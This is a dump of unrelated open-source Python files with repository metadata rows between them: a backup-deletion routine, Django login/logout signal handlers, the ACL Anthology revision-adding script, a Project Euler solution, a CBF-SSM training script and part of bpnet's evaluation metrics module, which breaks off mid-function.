    LOG.debug('restore %(backup_id)s to %(volume_id)s finished.',
              {'backup_id': backup_id, 'volume_id': volume_id})
def delete_backup(self, backup):
    """Delete the given backup."""
    container = backup['container']
    object_prefix = backup['service_metadata']
    LOG.debug('delete started, backup: %(id)s, container: %(cont)s, '
              'prefix: %(pre)s.',
              {'id': backup['id'], 'cont': container, 'pre': object_prefix})

    # Nothing was ever uploaded if either location field is missing;
    # in that case we only log completion below.
    if container is not None and object_prefix is not None:
        try:
            object_names = self._generate_object_names(backup)
        except Exception:
            LOG.warning('Error while listing objects, continuing'
                        ' with delete.')
            object_names = []

        for object_name in object_names:
            self.delete_object(container, object_name)
            LOG.debug('deleted object: %(object_name)s'
                      ' in container: %(container)s.',
                      {
                          'object_name': object_name,
                          'container': container
                      })
            # Deleting a backup's objects can take some time.
            # Yield so other threads can run
            eventlet.sleep(0)

    LOG.debug('delete %s finished.', backup['id'])
| 43.818182 | 84 | 0.593716 |
795470d88933e314b3e2fdf8dd3957ab05b3d47e | 123 | py | Python | seleniumwire/__init__.py | acidbotmaker/selenium-wire | 969fca764191a60794780146a5be45d78032bc0d | [
"MIT"
] | null | null | null | seleniumwire/__init__.py | acidbotmaker/selenium-wire | 969fca764191a60794780146a5be45d78032bc0d | [
"MIT"
] | null | null | null | seleniumwire/__init__.py | acidbotmaker/selenium-wire | 969fca764191a60794780146a5be45d78032bc0d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Top-level package for Selenium Wire."""
__author__ = """Will Keeling"""
__version__ = '2.1.2'
| 17.571429 | 42 | 0.609756 |
7954715a234b9701569edd77908231e729826b2b | 575 | py | Python | accounts/signals.py | Panda4817/MySousChef | 64c3967566b3834d578406884ee6b4a3807b21f8 | [
"MIT"
] | 1 | 2021-02-25T17:54:28.000Z | 2021-02-25T17:54:28.000Z | recipes/signals.py | Panda4817/MySousChef | 64c3967566b3834d578406884ee6b4a3807b21f8 | [
"MIT"
] | null | null | null | recipes/signals.py | Panda4817/MySousChef | 64c3967566b3834d578406884ee6b4a3807b21f8 | [
"MIT"
] | null | null | null | from django.contrib.auth.signals import user_logged_out, user_logged_in
from django.contrib import messages
# Custom signal and message for when user signs out
def show_logout_message(sender, user, request, **kwargs):
    """Receiver for user_logged_out: flash an info message on the request."""
    # fail_silently avoids raising when the message framework is unavailable.
    messages.info(request, 'You have been logged out', fail_silently=True)
# Custom signal and message for when user signs in
def show_login_message(sender, user, request, **kwargs):
    """Receiver for user_logged_in: flash an info message on the request."""
    # fail_silently avoids raising when the message framework is unavailable.
    messages.info(request, 'You are logged in', fail_silently=True)
user_logged_out.connect(show_logout_message)
user_logged_in.connect(show_login_message) | 38.333333 | 75 | 0.782609 |
79547187bd59b5a2ba14e2426bff9da2e3252285 | 8,405 | py | Python | bin/add_revision.py | tdopierre/acl-anthology | 8eed8a3fb0afa68ff2b6580626ee7c66de29694e | [
"Apache-2.0"
] | 221 | 2017-06-05T04:44:41.000Z | 2022-02-11T20:23:31.000Z | bin/add_revision.py | tdopierre/acl-anthology | 8eed8a3fb0afa68ff2b6580626ee7c66de29694e | [
"Apache-2.0"
] | 1,498 | 2017-08-09T13:41:49.000Z | 2022-03-31T02:56:58.000Z | bin/add_revision.py | tdopierre/acl-anthology | 8eed8a3fb0afa68ff2b6580626ee7c66de29694e | [
"Apache-2.0"
] | 183 | 2017-10-28T00:56:49.000Z | 2022-03-14T14:55:00.000Z | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2019 Matt Post <post@cs.jhu.edu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Used to add revisions to the Anthology.
Assumes all files have a base format like ANTHOLOGY_ROOT/P/P18/P18-1234.pdf format.
The revision process is as follows.
- The original paper is named as above.
- When a first revision is created, the original paper is archived to PYY-XXXXv1.pdf.
- The new revision is copied to PYY-XXXXvN, where N is the next revision ID (usually 2).
The new revision is also copied to PYY-XXXX.pdf.
This causes it to be returned by the anthology when the base paper format is queried.
Usage:
add_revision.py [-e] paper_id URL_OR_PATH.pdf "Short explanation".
`-e` denotes erratum instead of revision.
By default, a dry run happens.
When you are ready, add `--do`.
"""
import argparse
import filetype
import os
import shutil
import ssl
import sys
import tempfile
from anthology.utils import (
deconstruct_anthology_id,
make_simple_element,
indent,
compute_hash_from_file,
infer_url,
is_newstyle_id,
retrieve_url,
get_pdf_dir,
get_xml_file,
)
from anthology.data import (
PDF_LOCATION_TEMPLATE,
ANTHOLOGY_FILE_DIR,
)
import lxml.etree as ET
import urllib.request
from datetime import datetime
def validate_file_type(path):
    """Ensure downloaded file mime type matches its extension (e.g., PDF)"""
    detected = filetype.guess(path)
    # The file is acceptable when a type was detected and its MIME type is
    # consistent with the detected extension (e.g. 'application/pdf' / 'pdf').
    looks_valid = detected is not None and detected.mime.endswith(detected.extension)
    if looks_valid:
        return
    mime_type = detected.mime if detected is not None else 'UNKNOWN'
    print(
        f"FATAL: file {path} has MIME type {mime_type}",
        file=sys.stderr,
    )
    sys.exit(1)
def add_revision(
    anth_id, pdf_path, explanation, change_type="revision", dry_run=True, date=None
):
    """
    Takes an Anthology ID. It then adds a revision to the Anthology XML,
    updating and writing the XML file, and copies the PDFs into place.
    For PDFs, the revised PDF is saved to {anth_id}.pdf and {anth_id}v{version}.pdf.
    For the first revision, we first copy {anth_id}.pdf to {anth_id}v1.pdf.

    Args:
        anth_id: Anthology ID of the paper to revise.
        pdf_path: local path of the revised PDF.
        explanation: short free-text description of the change.
        change_type: "revision" or "erratum".
        dry_run: when True, only print the copy actions without writing.
        date: ISO 8601 date string; defaults to today.
    """
    if date is None:
        now = datetime.now()
        date = f"{now.year}-{now.month:02d}-{now.day:02d}"

    def maybe_copy(file_from, file_to):
        # Copy helper that honours dry_run; sets world-readable permissions.
        if not dry_run:
            print("-> Copying from {} -> {}".format(file_from, file_to), file=sys.stderr)
            shutil.copy(file_from, file_to)
            os.chmod(file_to, 0o644)
        else:
            print(
                "-> DRY RUN: Copying from {} -> {}".format(file_from, file_to),
                file=sys.stderr,
            )

    # The new version
    revno = None

    change_letter = "e" if change_type == "erratum" else "v"

    checksum = compute_hash_from_file(pdf_path)

    # Files for old-style IDs are stored under anthology-files/pdf/P/P19/*
    # Files for new-style IDs are stored under anthology-files/pdf/2020.acl/*
    output_dir = get_pdf_dir(anth_id)

    # Make sure directory exists
    if not os.path.exists(output_dir):
        print(f"-> Creating directory {output_dir}", file=sys.stderr)
        os.makedirs(output_dir)

    canonical_path = os.path.join(output_dir, f"{anth_id}.pdf")

    # Update XML
    xml_file = get_xml_file(anth_id)
    collection_id, volume_id, paper_id = deconstruct_anthology_id(anth_id)
    tree = ET.parse(xml_file)
    # Paper ID "0" denotes the volume's frontmatter rather than a paper.
    if paper_id == "0":
        paper = tree.getroot().find(f"./volume[@id='{volume_id}']/frontmatter")
    else:
        paper = tree.getroot().find(
            f"./volume[@id='{volume_id}']/paper[@id='{paper_id}']"
        )
    if paper is not None:
        # Next revision number: errata start at 1, revisions at 2, or one
        # past the highest existing id.
        revisions = paper.findall(change_type)
        revno = 1 if change_type == "erratum" else 2
        for revision in revisions:
            revno = int(revision.attrib["id"]) + 1

        if not dry_run:
            # Update the URL hash on the <url> tag
            url = paper.find("./url")
            if url is not None:
                url.attrib["hash"] = checksum

            if change_type == "revision" and revno == 2:
                if paper.find("./url") is not None:
                    current_version_url = infer_url(paper.find("./url").text) + ".pdf"

                # Download original file
                # There are no versioned files the first time around, so create the first one
                # (essentially backing up the original version)
                revised_file_v1_path = os.path.join(
                    output_dir, f"{anth_id}{change_letter}1.pdf"
                )
                retrieve_url(current_version_url, revised_file_v1_path)
                validate_file_type(revised_file_v1_path)

                old_checksum = compute_hash_from_file(revised_file_v1_path)

                # First revision requires making the original version explicit
                revision = make_simple_element(
                    change_type,
                    None,
                    attrib={
                        "id": "1",
                        "href": f"{anth_id}{change_letter}1",
                        "hash": old_checksum,
                    },
                    parent=paper,
                )

            revision = make_simple_element(
                change_type,
                explanation,
                attrib={
                    "id": str(revno),
                    "href": f"{anth_id}{change_letter}{revno}",
                    "hash": checksum,
                    "date": date,
                },
                parent=paper,
            )

            indent(tree.getroot())
            tree.write(xml_file, encoding="UTF-8", xml_declaration=True)
            print(
                f'-> Added {change_type} node "{revision.text}" to XML', file=sys.stderr
            )
    else:
        print(
            f"-> FATAL: paper ID {anth_id} not found in the Anthology",
            file=sys.stderr,
        )
        sys.exit(1)

    revised_file_versioned_path = os.path.join(
        output_dir, f"{anth_id}{change_letter}{revno}.pdf"
    )

    # Copy the file to the versioned path
    maybe_copy(pdf_path, revised_file_versioned_path)

    # Copy it over the canonical path
    if change_type == "revision":
        maybe_copy(pdf_path, canonical_path)
def main(args):
    """Run a single revision/erratum request parsed from the command line."""
    if args.erratum:
        change_type = "erratum"
    else:
        change_type = "revision"
    print(f"Processing {change_type} to {args.anthology_id}...")

    # TODO: make sure path exists, or download URL to temp file
    is_remote = args.path.startswith("http")
    if is_remote:
        # Download remote PDFs to a temporary file first.
        _, input_file_path = tempfile.mkstemp()
        retrieve_url(args.path, input_file_path)
    else:
        input_file_path = args.path

    validate_file_type(input_file_path)

    add_revision(
        args.anthology_id,
        input_file_path,
        args.explanation,
        change_type=change_type,
        dry_run=args.dry_run,
    )

    # Clean up the temporary download, if any.
    if is_remote:
        os.remove(input_file_path)
# CLI entry point: parse arguments and delegate to main().
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "anthology_id", help="The Anthology paper ID to revise (e.g., P18-1001)"
    )
    parser.add_argument(
        "path", type=str, help="Path to the revised paper ID (can be URL)"
    )
    parser.add_argument("explanation", help="Brief description of the changes.")
    parser.add_argument(
        "--erratum",
        "-e",
        action="store_true",
        help="This is an erratum instead of a revision.",
    )
    # Default date is today, in ISO 8601 format.
    now = datetime.now()
    today = f"{now.year}-{now.month:02d}-{now.day:02d}"
    parser.add_argument(
        "--date",
        "-d",
        type=str,
        default=today,
        help="The date of the revision (ISO 8601 format)",
    )
    parser.add_argument(
        "--dry-run", "-n", action="store_true", default=False, help="Just a dry run."
    )
    args = parser.parse_args()

    main(args)
| 31.716981 | 93 | 0.612731 |
795471a47a4c337a042a18e73f2bfabcc488d758 | 1,116 | py | Python | project_euler/python/179.py | hacktoolkit/code_challenges | d71f8362496a72963a53abba7bcc9dd4d35a2920 | [
"MIT"
] | 10 | 2015-01-31T09:04:45.000Z | 2022-01-08T04:09:48.000Z | project_euler/python/179.py | hacktoolkit/code_challenges | d71f8362496a72963a53abba7bcc9dd4d35a2920 | [
"MIT"
] | 3 | 2016-05-16T07:37:01.000Z | 2016-05-18T14:14:16.000Z | project_euler/python/179.py | hacktoolkit/code_challenges | d71f8362496a72963a53abba7bcc9dd4d35a2920 | [
"MIT"
] | 6 | 2015-02-06T06:00:00.000Z | 2020-02-13T16:13:48.000Z | """
http://projecteuler.net/problem=179
Consecutive positive divisors
Find the number of integers 1 < n < 10^7, for which n and n + 1 have the same number of positive divisors. For example, 14 has the positive divisors 1, 2, 7, 14 while 15 has 1, 3, 5, 15.
Solution by jontsai <hello@jontsai.com>
"""
from utils import *
class Solution(object):
    # NOTE(review): this file uses Python 2 syntax (xrange, print statements).
    # TARGET/EXPECTED_ANSWER pairs: the small pair is for quick testing,
    # the commented-out pair is the real Project Euler input.
    TARGET = 16
    EXPECTED_ANSWER = 2

    # TARGET = 10**7
    # EXPECTED_ANSWER = 0

    def __init__(self):
        pass

    def solve(self):
        """Count n in (1, TARGET) whose divisor count equals that of n - 1."""
        count = 0
        prev_num_divisors = None
        for n in xrange(2, Solution.TARGET):
            # Progress indicator for long runs.
            if n % 1000 == 0:
                print n
            divisors = get_divisors(n)
            num_divisors = len(divisors)
            # Compare against the previous n's divisor count (consecutive pair).
            if prev_num_divisors is not None and prev_num_divisors == num_divisors:
                count += 1
            prev_num_divisors = num_divisors
        answer = count
        return answer
def main():
    # Solve the problem and print the result next to the expected answer.
    solution = Solution()
    answer = solution.solve()
    print 'Expected: %s, Answer: %s' % (Solution.EXPECTED_ANSWER, answer)


if __name__ == '__main__':
    main()
| 22.77551 | 186 | 0.606631 |
7954729660e749e8c7452ff3c5bc8a3176146388 | 1,611 | py | Python | run/run_robomove.py | silvanmelchior/CBF-SSM | 34a5300f4b9a58e945c04d6c85f6e649ec63e609 | [
"Apache-2.0",
"MIT"
] | 7 | 2019-08-02T17:08:39.000Z | 2021-10-06T07:52:28.000Z | run/run_robomove.py | silvanmelchior/CBF-SSM | 34a5300f4b9a58e945c04d6c85f6e649ec63e609 | [
"Apache-2.0",
"MIT"
] | 4 | 2020-01-28T22:50:40.000Z | 2021-08-25T15:39:34.000Z | run/run_robomove.py | silvanmelchior/CBF-SSM | 34a5300f4b9a58e945c04d6c85f6e649ec63e609 | [
"Apache-2.0",
"MIT"
] | null | null | null | import numpy as np
from cbfssm.datasets import RoboMove
from cbfssm.training import Trainer
from cbfssm.outputs import OutputsRoboMove
from cbfssm.model import CBFSSM
# curriculum learning scheme presented in appendix
# first train w/o entropy, then add it
for phase in range(2):

    #
    # Config
    #
    root_dir = "run_output/robomove"
    # dataset
    ds_sel = RoboMove
    seq_len = 300
    seq_stride = 50
    # model
    model_sel = CBFSSM
    dim_x = 4
    model_config = {
        # dataset
        'ds': ds_sel,
        'batch_size': 32,
        'shuffle': 10000,
        # method
        'dim_x': dim_x,
        'ind_pnt_num': 100,
        'samples': 50,
        'learning_rate': 0.01,
        # second loss factor (entropy term) is zero in phase 0, enabled in phase 1
        'loss_factors': np.asarray([20., 2. * (phase == 1)]),
        'k_factor': 1.,
        'recog_len': 50,
        # variables init state
        'zeta_pos': 2.,
        'zeta_mean': 0.1 ** 2,
        'zeta_var': 0.01 ** 2,
        'var_x': np.asarray([0.1 ** 2] * dim_x),
        'var_y': np.asarray([1. ** 2] * dim_x),
        'gp_var': 0.1 ** 2,
        'gp_len': 1.
    }
    # training
    train = True
    # retrain=True in phase 1 (presumably resumes the phase-0 run — see Trainer)
    retrain = (phase == 1)
    epochs = 100
    # evaluation
    output_sel = OutputsRoboMove

    #
    # Run
    #
    # load
    outputs = output_sel(root_dir)
    ds = ds_sel(seq_len, seq_stride)
    outputs.set_ds(ds)
    model = model_sel(model_config)
    outputs.set_model(model, root_dir)

    # train
    if train:
        trainer = Trainer(model, root_dir)
        trainer.train(ds, epochs, retrain=retrain)
        outputs.set_trainer(trainer)

    # evaluate
    outputs.create_all()
| 23.691176 | 61 | 0.571695 |
795472ef2f4cc97e2262386f93ca8ca3420c8b7f | 187 | py | Python | 1stSemester_PythonCourse/work7/E01_1827406005.py | chenyz2000/schoolCourses | cca7f25b0f44186e0c248b26b5d7ed2bcb23c630 | [
"MIT"
] | null | null | null | 1stSemester_PythonCourse/work7/E01_1827406005.py | chenyz2000/schoolCourses | cca7f25b0f44186e0c248b26b5d7ed2bcb23c630 | [
"MIT"
] | null | null | null | 1stSemester_PythonCourse/work7/E01_1827406005.py | chenyz2000/schoolCourses | cca7f25b0f44186e0c248b26b5d7ed2bcb23c630 | [
"MIT"
def func1(s):
    """Return the first two plus last two characters of s, or '' if len(s) < 2."""
    if len(s) < 2:
        return ''
    return s[:2] + s[-2:]
if __name__=="__main__":
print(func1("python"))
print(func1("py"))
print(func1("p")) | 20.777778 | 29 | 0.497326 |
795473ef8c0dfe7722973dc8cfed86ac2c8e50e6 | 19,917 | py | Python | bpnet/metrics.py | mlweilert/bpnet | dcc9e8d805f9de774ae9dcc62c20504915be614f | [
"MIT"
] | 93 | 2019-08-15T19:49:19.000Z | 2022-03-04T08:23:44.000Z | bpnet/metrics.py | mlweilert/bpnet | dcc9e8d805f9de774ae9dcc62c20504915be614f | [
"MIT"
] | 29 | 2019-08-15T15:44:44.000Z | 2022-03-28T06:56:07.000Z | bpnet/metrics.py | mlweilert/bpnet | dcc9e8d805f9de774ae9dcc62c20504915be614f | [
"MIT"
] | 24 | 2019-08-29T18:54:36.000Z | 2022-03-23T21:04:46.000Z | import sklearn.metrics as skm
import logging
import matplotlib.pyplot as plt
from bpnet.utils import read_pkl
from keras.models import load_model
from bpnet.utils import _listify, create_tf_session
from bpnet.stats import permute_array
from bpnet.functions import softmax, mean
import os
import json
from tqdm import tqdm
import matplotlib
import pandas as pd
import numpy as np
from collections import OrderedDict
import gin
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
# Metric helpers
def average_profile(pe):
    """Average the per-task profile auPRC for every binsize."""
    task_names = list(pe)
    # All tasks share the same binsizes; take them from the first task.
    first_task_result = pe[task_names[0]]
    averaged = {}
    for binsize in first_task_result:
        scores = [pe[task][binsize]['auprc'] for task in task_names]
        averaged[binsize] = {"auprc": mean(scores)}
    return averaged
def average_counts(pe):
    """Average each count metric across all tasks."""
    task_names = list(pe)
    # All tasks expose the same metric names; take them from the first task.
    metric_names = list(pe[task_names[0]])
    averaged = {}
    for metric in metric_names:
        averaged[metric] = mean([pe[task][metric] for task in task_names])
    return averaged
def bin_counts_max(x, binsize=2):
    """Max-pool counts along the position axis in non-overlapping bins.

    x: array of shape (batch, positions, channels); returns an array of
    shape (batch, positions // binsize, channels).
    """
    if binsize == 1:
        return x
    assert len(x.shape) == 3
    n_bins = x.shape[1] // binsize
    pooled = np.zeros((x.shape[0], n_bins, x.shape[2]))
    for b in range(n_bins):
        start = binsize * b
        pooled[:, b, :] = x[:, start:start + binsize, :].max(1)
    return pooled
def bin_counts_amb(x, binsize=2):
    """Bin ternary labels (1=peak, 0=background, -1=ambiguous).

    A bin is 1 if any position in it is a peak, else -1 if any position
    is ambiguous, else 0. Input shape (batch, positions, channels).
    """
    if binsize == 1:
        return x
    assert len(x.shape) == 3
    n_bins = x.shape[1] // binsize
    binned = np.zeros((x.shape[0], n_bins, x.shape[2])).astype(float)
    for b in range(n_bins):
        window = x[:, (binsize * b):(binsize * (b + 1)), :]
        any_amb = np.any(window == -1, axis=1)
        any_peak = np.any(window == 1, axis=1)
        # if no peak and has_amb -> -1
        # if no peak and no has_amb -> 0
        # if peak -> 1
        binned[:, b, :] = (any_peak - (1 - any_peak) * any_amb).astype(float)
    return binned
def bin_counts_summary(x, binsize=2, fn=np.max):
    """Bin the counts, summarising each bin with an arbitrary 1-D function.

    `fn` is applied along the position axis of every non-overlapping bin
    (default: max). Input shape (batch, positions, channels).
    """
    if binsize == 1:
        return x
    assert len(x.shape) == 3
    n_bins = x.shape[1] // binsize
    summarised = np.zeros((x.shape[0], n_bins, x.shape[2]))
    for b in range(n_bins):
        window = x[:, (binsize * b):(binsize * (b + 1)), :]
        summarised[:, b, :] = np.apply_along_axis(fn, 1, window)
    return summarised
def eval_profile(yt, yp,
                 pos_min_threshold=0.05,
                 neg_max_threshold=0.01,
                 required_min_pos_counts=2.5,
                 binsizes=[1, 2, 4, 10]):
    """
    Evaluate the profile in terms of auPR

    Args:
      yt: true profile (counts)
      yp: predicted profile (fractions)
      pos_min_threshold: fraction threshold above which the position is
         considered to be a positive
      neg_max_threshold: fraction threshold bellow which the position is
         considered to be a negative
      required_min_pos_counts: smallest number of reads the peak should be
         supported by. All regions where 0.05 of the total reads would be
         less than required_min_pos_counts are excluded
      binsizes: list of bin sizes at which to compute the auPRC

    Returns:
      pd.DataFrame with one row per binsize (auprc, random_auprc,
      n_positives, frac_ambigous, imbalance).
    """
    # The filtering
    # criterion assures that each position in the positive class is
    # supported by at least required_min_pos_counts of reads
    do_eval = yt.sum(axis=1).mean(axis=1) > required_min_pos_counts / pos_min_threshold

    # make sure everything sums to one
    yp = yp / yp.sum(axis=1, keepdims=True)
    fracs = yt / yt.sum(axis=1, keepdims=True)

    # Shuffled predictions serve as the random baseline.
    yp_random = permute_array(permute_array(yp[do_eval], axis=1), axis=0)
    out = []
    for binsize in binsizes:
        # Ternary labels: 1=peak, 0=negative, -1=ambiguous (in between).
        is_peak = (fracs >= pos_min_threshold).astype(float)
        ambigous = (fracs < pos_min_threshold) & (fracs >= neg_max_threshold)
        is_peak[ambigous] = -1
        y_true = np.ravel(bin_counts_amb(is_peak[do_eval], binsize))

        imbalance = np.sum(y_true == 1) / np.sum(y_true >= 0)
        n_positives = np.sum(y_true == 1)
        n_ambigous = np.sum(y_true == -1)
        frac_ambigous = n_ambigous / y_true.size

        # TODO - I used to have bin_counts_max over here instead of bin_counts_sum
        try:
            res = auprc(y_true,
                        np.ravel(bin_counts_max(yp[do_eval], binsize)))
            res_random = auprc(y_true,
                               np.ravel(bin_counts_max(yp_random, binsize)))
        except Exception:
            # auPRC can fail (e.g. no positives); report NaN for this binsize.
            res = np.nan
            res_random = np.nan

        out.append({"binsize": binsize,
                    "auprc": res,
                    "random_auprc": res_random,
                    "n_positives": n_positives,
                    "frac_ambigous": frac_ambigous,
                    "imbalance": imbalance
                    })

    return pd.DataFrame.from_dict(out)
# --------------------------------------------
@gin.configurable
class BPNetSeparatePostproc:
    """Split raw model outputs into {profile, counts} dicts keyed by task.

    Expects `preds` to be ordered as [profile head per task...,
    count head per task...]; profile logits are softmax-normalized and
    count predictions/targets are summed over the last axis.
    """

    def __init__(self, tasks):
        # Task names, in the same order as the model's output heads.
        self.tasks = tasks

    def __call__(self, y_true, preds):
        profile_preds = {task: softmax(preds[task_i])
                         for task_i, task in enumerate(self.tasks)}
        # Count heads follow all profile heads in the preds list.
        count_preds = {task: preds[len(self.tasks) + task_i].sum(axis=-1)
                       for task_i, task in enumerate(self.tasks)}
        profile_true = {task: y_true[f'profile/{task}']
                        for task in self.tasks}
        counts_true = {task: y_true[f'counts/{task}'].sum(axis=-1)
                       for task in self.tasks}
        return ({"profile": profile_true, "counts": counts_true},
                {"profile": profile_preds, "counts": count_preds})
@gin.configurable
class BPNetSinglePostproc:
    """Example where we predict a single track

    Derives both profile (per-position normalized) and counts
    (log(1 + total)) views from a single predicted track per task.
    """

    def __init__(self, tasks):
        # Task names, in the same order as the model's outputs.
        self.tasks = tasks

    def __call__(self, y_true, preds):
        # Normalize each predicted track to a per-position distribution.
        profile_preds = {task: preds[task_i] / preds[task_i].sum(axis=-2, keepdims=True)
                         for task_i, task in enumerate(self.tasks)}
        # Total-count view: log(1 + sum over the last two axes).
        count_preds = {task: np.log(1 + preds[task_i].sum(axis=(-2, -1)))
                       for task_i, task in enumerate(self.tasks)}
        profile_true = {task: y_true[f'profile/{task}']
                        for task in self.tasks}
        counts_true = {task: np.log(1 + y_true[f'profile/{task}'].sum(axis=(-2, -1)))
                      for task in self.tasks}
        return ({"profile": profile_true, "counts": counts_true},
                {"profile": profile_preds, "counts": count_preds})
@gin.configurable
class BPNetMetric:
    """BPNet metrics when the net is predicting counts and profile separately
    """

    def __init__(self, tasks, count_metric,
                 profile_metric=None,
                 postproc_fn=None):
        """
        Args:
          tasks: tasks
          count_metric: count evaluation metric
          profile_metric: profile evaluation metric
          postproc_fn: callable mapping (y_true, preds) to
              ({profile, counts} targets, {profile, counts} predictions);
              defaults to BPNetSeparatePostproc.
        """
        self.tasks = tasks
        self.count_metric = count_metric
        self.profile_metric = profile_metric

        if postproc_fn is None:
            self.postproc_fn = BPNetSeparatePostproc(tasks=self.tasks)
        else:
            self.postproc_fn = postproc_fn

    def __call__(self, y_true, preds):
        # extract the profile and count predictions
        y_true, preds = self.postproc_fn(y_true, preds)
        out = {}
        # Per-task count metrics plus their cross-task average.
        out["counts"] = {task: self.count_metric(y_true['counts'][task],
                                                 preds['counts'][task])
                         for task in self.tasks}
        out["counts"]['avg'] = average_counts(out["counts"])

        out["avg"] = {"counts": out["counts"]['avg']}  # new system compatibility
        if self.profile_metric is not None:
            # Per-task profile metrics plus their cross-task average.
            out["profile"] = {task: self.profile_metric(y_true['profile'][task],
                                                        preds['profile'][task])
                              for task in self.tasks}
            out["profile"]['avg'] = average_profile(out["profile"])
            out["avg"]['profile'] = out["profile"]['avg']
        return out
@gin.configurable
class BPNetMetricSingleProfile:
    """BPNet metrics when the net is predicting the total counts + profile at the same time
    """

    def __init__(self, count_metric,
                 profile_metric=None):
        """
        Args:
          count_metric: count evaluation metric
          profile_metric: profile evaluation metric
        """
        # self.tasks = tasks
        self.count_metric = count_metric
        self.profile_metric = profile_metric

    def __call__(self, y_true, preds):
        # extract the profile and count predictions
        out = {}
        # sum across positions + strands
        out["counts"] = self.count_metric(np.log(1 + y_true.sum(axis=(-2, -1))),
                                          np.log(1 + preds.sum(axis=(-2, -1))))

        if self.profile_metric is not None:
            out["profile"] = self.profile_metric(y_true, preds)
        return out
@gin.configurable
class PeakPredictionProfileMetric:
    """Profile metric wrapping eval_profile with fixed thresholds.

    Returns a dict keyed by 'binsize=<k>' with the per-binsize results.
    """

    def __init__(self, pos_min_threshold=0.05,
                 neg_max_threshold=0.01,
                 required_min_pos_counts=2.5,
                 binsizes=[1, 10]):
        # See eval_profile for the meaning of these thresholds.
        self.pos_min_threshold = pos_min_threshold
        self.neg_max_threshold = neg_max_threshold
        self.required_min_pos_counts = required_min_pos_counts
        self.binsizes = binsizes

    def __call__(self, y_true, y_pred):
        out = eval_profile(y_true, y_pred,
                           pos_min_threshold=self.pos_min_threshold,
                           neg_max_threshold=self.neg_max_threshold,
                           required_min_pos_counts=self.required_min_pos_counts,
                           binsizes=self.binsizes)
        return {f"binsize={k}": v for k, v in out.set_index("binsize").to_dict("index").items()}
# Default profile-metric configuration used for BPNet evaluation.
default_peak_pred_metric = PeakPredictionProfileMetric(pos_min_threshold=0.015,
                                                       neg_max_threshold=0.005,
                                                       required_min_pos_counts=2.5,
                                                       binsizes=[1, 10])
# --------------------------------------------
# Combined metrics
@gin.configurable
class BootstrapMetric:
    """Evaluate a metric on n bootstrap resamples of (y_true, y_pred)."""

    def __init__(self, metric, n):
        """
        Args:
          metric: a function accepting (y_true and y_pred) and
             returning the evaluation result
          n: number of bootstrap samples to draw
        """
        self.metric = metric
        self.n = n

    def __call__(self, y_true, y_pred):
        outl = []
        for i in range(self.n):
            # Sample len(y_true) indices with replacement.
            bsamples = (
                pd.Series(np.arange(len(y_true))).sample(frac=1, replace=True).values
            )
            outl.append(self.metric(y_true[bsamples], y_pred[bsamples]))
        return outl
@gin.configurable
class MetricsList:
    """Wraps a list of metrics into a single metric returning a list"""

    def __init__(self, metrics):
        self.metrics = metrics

    def __call__(self, y_true, y_pred):
        results = []
        for metric_fn in self.metrics:
            results.append(metric_fn(y_true, y_pred))
        return results
@gin.configurable
class MetricsDict:
    """Wraps a dictionary of metrics into a single metric returning a dictionary"""

    def __init__(self, metrics):
        self.metrics = metrics

    def __call__(self, y_true, y_pred):
        results = {}
        for name, metric_fn in self.metrics.items():
            results[name] = metric_fn(y_true, y_pred)
        return results
@gin.configurable
class MetricsTupleList:
    """Wraps a (name, metric) tuple list into a single metric returning a tuple list"""

    def __init__(self, metrics):
        self.metrics = metrics

    def __call__(self, y_true, y_pred):
        results = []
        for name, metric_fn in self.metrics:
            results.append((name, metric_fn(y_true, y_pred)))
        return results
@gin.configurable
class MetricsOrderedDict:
    """Wraps a OrderedDict/tuple list of metrics into a single metric
    returning an OrderedDict
    """

    def __init__(self, metrics):
        self.metrics = metrics

    def __call__(self, y_true, y_pred):
        results = OrderedDict()
        for name, metric_fn in self.metrics:
            results[name] = metric_fn(y_true, y_pred)
        return results
@gin.configurable
class MetricsMultiTask:
"""Run the same metric across multiple tasks
"""
def __init__(self, metrics, task_names=None):
self.metrics = metrics
self.task_names = task_names
def __call__(self, y_true, y_pred):
n_tasks = y_true.shape[1]
if self.task_names is None:
self.task_names = [i for i in range(n_tasks)]
else:
assert len(self.task_names) == n_tasks
return OrderedDict([(task, self.metrics(y_true[:, i], y_pred[:, i]))
for i, task in enumerate(self.task_names)])
@gin.configurable
class MetricsAggregated:
def __init__(self,
metrics,
agg_fn={"mean": np.mean, "std": np.std},
prefix=""):
self.metrics
self.agg_fn = agg_fn
self.prefix = prefix
def __call__(self, y_true, y_pred):
out = self.metrics(y_true, y_pred)
# TODO - generalize using numpy_collate?
m = np.array(list(out.values()))
return {self.prefix + k: fn(m) for k, fn in self.agg_fn}
@gin.configurable
class MetricsConcise:
def __init__(self, metrics):
import concise
self.metrics_dict = OrderedDict([(m, concise.eval_metrics.get(m))
for m in metrics])
def __call__(self, y_true, y_pred):
return OrderedDict([(m, fn(y_true, y_pred))
for m, fn in self.metrics_dict.items()])
# -----------------------------
# Binary classification
# Metric helpers
MASK_VALUE = -1
# Binary classification
def _mask_nan(y_true, y_pred):
mask_array = ~np.isnan(y_true)
if np.any(np.isnan(y_pred)):
print("WARNING: y_pred contains {0}/{1} np.nan values. removing them...".
format(np.sum(np.isnan(y_pred)), y_pred.size))
mask_array = np.logical_and(mask_array, ~np.isnan(y_pred))
return y_true[mask_array], y_pred[mask_array]
def _mask_value(y_true, y_pred, mask=MASK_VALUE):
mask_array = y_true != mask
return y_true[mask_array], y_pred[mask_array]
def _mask_value_nan(y_true, y_pred, mask=MASK_VALUE):
y_true, y_pred = _mask_nan(y_true, y_pred)
return _mask_value(y_true, y_pred, mask)
@gin.configurable
def n_positive(y_true, y_pred):
return y_true.sum()
@gin.configurable
def n_negative(y_true, y_pred):
return (1 - y_true).sum()
@gin.configurable
def frac_positive(y_true, y_pred):
return y_true.mean()
@gin.configurable
def accuracy(y_true, y_pred, round=True):
"""Classification accuracy
"""
y_true, y_pred = _mask_value_nan(y_true, y_pred)
if round:
y_true = np.round(y_true)
y_pred = np.round(y_pred)
